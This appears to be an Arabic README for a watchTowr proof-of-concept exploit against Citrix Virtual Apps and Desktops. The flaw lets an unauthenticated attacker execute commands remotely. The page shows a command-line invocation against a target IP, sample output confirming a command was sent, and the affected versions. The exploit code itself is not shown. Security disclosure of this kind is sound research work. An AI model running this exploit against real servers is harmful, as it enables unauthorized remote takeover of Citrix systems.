
تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه في Citrix Virtual Apps and Desktops (XEN)
تنفيذ أوامر عن بُعد بدون مصادقة في Citrix Virtual Apps and Desktops (XEN)
انظر منشور مدونتنا للحصول على التفاصيل الفنية
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-xxxx-xxxxx]
[INFO] Command sent to 192.168.1.120 successfully!
أي إصدار من Citrix Virtual Apps and Desktops 7 2402 LTSR وما قبله يعتبر معرضًا للخطر، لمزيد من التفاصيل راجع إشعار سيتريكس
تمت كتابة هذا الاستغلال بواسطة Sina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber)
لأحدث الأبحاث الأمنية، تابع فريق watchTowr Labs